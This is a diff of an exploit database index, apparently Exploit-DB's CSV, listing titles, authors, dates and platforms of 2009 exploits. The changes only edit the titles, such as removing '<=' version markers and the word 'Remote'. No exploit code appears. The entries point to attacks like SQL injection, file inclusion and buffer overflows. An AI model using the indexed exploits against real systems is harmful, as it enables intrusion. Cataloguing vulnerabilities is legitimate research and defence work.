7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Auth Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 -7957,platforms/windows/local/7957.pl,"Free Download Manager <= 3.0 Build 844 - (.torrent) BoF Exploit",2009-02-03,SkD,windows,local,0 +7957,platforms/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - (.torrent) BoF Exploit",2009-02-03,SkD,windows,local,0 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Remote Shell Upload",2009-02-03,"Hussin X",php,webapps,0 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Auth Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0 -7964,platforms/php/webapps/7964.txt,"4Site CMS <= 2.6 - Multiple Remote SQL Injection Vulnerabilities",2009-02-03,D.Mortalov,php,webapps,0 +7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injection Vulnerabilities",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 7966,platforms/windows/remote/7966.txt,"navicopa webserver 3.0.1 - (bof/sd) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha Remote Command Execution Exploit",2009-02-03,Osirys,php,webapps,0 @@ -7503,7 +7503,7 @@ id,file,description,date,author,platform,type,port 7972,platforms/php/webapps/7972.py,"Openfiler 2.3 - (Auth Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 - (.pls) Universal Local Buffer Overflow Exploit",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit (xp/sp3)",2009-02-04,"Single Eye",windows,local,0 -7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 +7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion Vulnerabilities",2009-02-04,fuzion,php,webapps,0 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 @@ -7511,8 +7511,8 @@ id,file,description,date,author,platform,type,port 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (DD/XSS) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - (DD/XSS) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 -7984,platforms/php/webapps/7984.pl,"YapBB <= 1.2 - (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 -7985,platforms/windows/dos/7985.pl,"Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 +7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 +7985,platforms/windows/dos/7985.pl,"Novell GroupWise 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack BoF PoC",2009-02-04,"Praveen Darshanam",windows,dos,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (upload/bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow Exploit (xp)",2009-02-04,"Rob Carter",windows,remote,0 @@ -7524,39 +7524,39 @@ id,file,description,date,author,platform,type,port 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow Exploit",2009-02-05,SimO-s0fT,windows,local,0 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 outline Tag Buffer Overflow Exploit PoC",2009-02-05,"Praveen Darshanam",windows,dos,0 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 -7997,platforms/php/webapps/7997.htm,"txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 +7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities",2009-02-06,SirGod,php,webapps,0 -8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) Remote SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 -8003,platforms/php/webapps/8003.pl,"1024 CMS <= 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 +8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 +8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Remote File Upload",2009-02-09,fantastic,php,webapps,0 -8007,platforms/php/webapps/8007.php,"IF-CMS <= 2.0 - (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 +8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router DoS",2009-02-09,Rembrandt,hardware,dos,0 -8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 -8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 -8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 - (id) Remote SQL Injection",2009-02-09,K-159,php,webapps,0 +8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 +8010,platforms/windows/local/8010.pl,"FeedDemon 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 +8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - (id) SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - (.JPG) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 -8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 -8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS <= 1.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 +8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 +8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 - (XSS/RFI) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - (RFI/XSS) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 -8018,platforms/php/webapps/8018.txt,"FlexCMS (catId) Remote SQL Injection",2009-02-09,MisterRichard,php,webapps,0 +8018,platforms/php/webapps/8018.txt,"FlexCMS (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 - (09.01.22) XSS",2009-02-09,make0day,php,webapps,0 -8020,platforms/php/webapps/8020.txt,"Yet Another NOCC <= 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 +8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit",2009-02-09,"Praveen Darshanam",multiple,dos,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0 -8023,platforms/hardware/remote/8023.txt,"ZeroShell <= 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0 +8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0 8024,platforms/windows/dos/8024.py,"TightVNC Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion Vulnerabilities",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - (LFI) Remote Command Execution Exploit",2009-02-09,Osirys,php,webapps,0 -8029,platforms/php/webapps/8029.txt,"Thyme <= 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 +8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution Exploit",2009-02-10,Fireshot,php,webapps,0 8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0 @@ -7572,25 +7572,25 @@ id,file,description,date,author,platform,type,port 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - (XSS/SQL/dd) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - (searchmatch.php) SQL Injection",2009-02-11,nuclear,php,webapps,0 -8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) Remote SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 +8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Auth Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulnerabilities",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (LFI/SQL) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 -8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - (id) Remote SQL Injection",2009-02-13,JIKO,php,webapps,0 +8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - (id) SQL Injection",2009-02-13,JIKO,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote FD / SQL Injection Exploit",2009-02-13,Osirys,php,webapps,0 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - (info.php item) SQL Command Injection Exploit",2009-02-13,Osirys,php,webapps,0 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Local Privilege Escalation Exploit",2009-02-16,kingcope,freebsd,local,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS",2009-02-16,rAWjAW,php,webapps,0 -8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0 +8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 -8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 +8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - (SQL/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 -8064,platforms/php/webapps/8064.pl,"MemHT Portal <= 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 +8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - (myhotel_info.asp) SQL Injection",2009-02-16,Darkb0x,asp,webapps,0 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 @@ -7607,7 +7607,7 @@ id,file,description,date,author,platform,type,port 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 -8083,platforms/php/webapps/8083.txt,"phpBB 3 - (autopost bot mod <= 0.1.3) Remote File Include",2009-02-20,Kacper,php,webapps,0 +8083,platforms/php/webapps/8083.txt,"phpBB 3 - (autopost bot mod 0.1.3) Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 @@ -7621,27 +7621,27 @@ id,file,description,date,author,platform,type,port 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router Sms XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 -8097,platforms/multiple/remote/8097.txt,"MLdonkey <= 2.9.7 - HTTP DOUBLE SLASH Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 -8098,platforms/php/webapps/8098.txt,"taifajobs <= 1.0 - (jobid) Remote SQL Injection",2009-02-23,K-159,php,webapps,0 +8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - HTTP DOUBLE SLASH Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 +8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) (0Day)",2009-02-23,"Guido Landi",windows,dos,0 -8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery (pid) Remote SQL Injection Exploit",2009-02-23,StAkeR,php,webapps,0 +8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery (pid) SQL Injection Exploit",2009-02-23,StAkeR,php,webapps,0 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Auth Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 -8104,platforms/php/webapps/8104.txt,"Qwerty CMS (id) Remote SQL Injection",2009-02-24,b3,php,webapps,0 +8104,platforms/php/webapps/8104.txt,"Qwerty CMS (id) SQL Injection",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 -8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Auth Bypass) Remote SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 -8108,platforms/osx/local/8108.c,"Apple MACOS X xnu <= 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 +8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Auth Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 +8108,platforms/osx/local/8108.c,"Apple MACOS X xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8112,platforms/php/webapps/8112.txt,"Golabi CMS Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions Newsletter Manager Pro - Auth Bypass",2009-02-26,ByALBAYX,asp,webapps,0 -8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery <= 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 -8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery <= 1.4.20 - (IMG) Privilege Escalation Exploit",2009-02-26,Inphex,php,webapps,0 +8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 +8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation Exploit",2009-02-26,Inphex,php,webapps,0 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Auth Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 -8118,platforms/windows/remote/8118.html,"Orbit <= 2.8.4 Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 +8118,platforms/windows/remote/8118.html,"Orbit 2.8.4 Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - (.HEX) Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (XSS/RFI/bSQL) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 @@ -7669,26 +7669,26 @@ id,file,description,date,author,platform,type,port 8145,platforms/php/webapps/8145.txt,"ghostscripter Amazon Shop - (XSS/DT/RFI) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (multiple headers) Remote Denial of Service Exploit",2009-03-03,"Praveen Darshanam",multiple,dos,0 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass",2009-03-03,Stack,windows,remote,0 -8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 - (message) Persistent XSS",2009-03-03,Pepelux,php,webapps,0 -8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 +8150,platforms/php/webapps/8150.txt,"NovaBoard 1.0.1 - (message) Persistent XSS",2009-03-03,Pepelux,php,webapps,0 +8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow Exploit (Perl)",2009-03-04,Dr4sH,windows,remote,80 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure",2009-03-04,Stack,windows,remote,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0 -8158,platforms/windows/local/8158.pl,"Winamp <= 5.541 - Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0 +8158,platforms/windows/local/8158.pl,"Winamp 5.541 - Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0 8159,platforms/windows/local/8159.rb,"Media Commands .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8162,platforms/windows/local/8162.py,"Media Commands (.m3u) Universal SEH Overwrite Exploit",2009-03-05,His0k4,windows,local,0 8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service Exploit",2009-03-05,SecurityReason,bsd,dos,0 8164,platforms/php/webapps/8164.php,"Joomla com_ijoomla_archive Blind SQL Injection Exploit",2009-03-05,Stack,php,webapps,0 -8165,platforms/php/webapps/8165.txt,"Blue Eye CMS <= 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 +8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 8166,platforms/php/webapps/8166.txt,"wili-cms 0.4.0 - (RFI/LFI/ab) Multiple Vulnerabilities",2009-03-06,"Salvatore Fresta",php,webapps,0 -8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - (praises.php id) Remote SQL Injection",2009-03-06,dun,php,webapps,0 -8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk <= 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 -8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 +8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - (praises.php id) SQL Injection",2009-03-06,dun,php,webapps,0 +8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 +8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injection Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 - (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 -8172,platforms/php/webapps/8172.txt,"cms s.builder <= 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 +8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 @@ -7697,8 +7697,8 @@ id,file,description,date,author,platform,type,port 8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 - (.m3u) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 8179,platforms/windows/local/8179.rb,"MediaCoder 0.6.2.4275 - Universal Buffer Overflow Exploit (SEH)",2009-03-09,Stack,windows,local,0 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 -8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 - (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 -8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - (base_id) Remote SQL Injection",2009-03-09,d3b4g,php,webapps,0 +8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 +8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - (base_id) SQL Injection",2009-03-09,d3b4g,php,webapps,0 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL/DT/XSS) Multiple 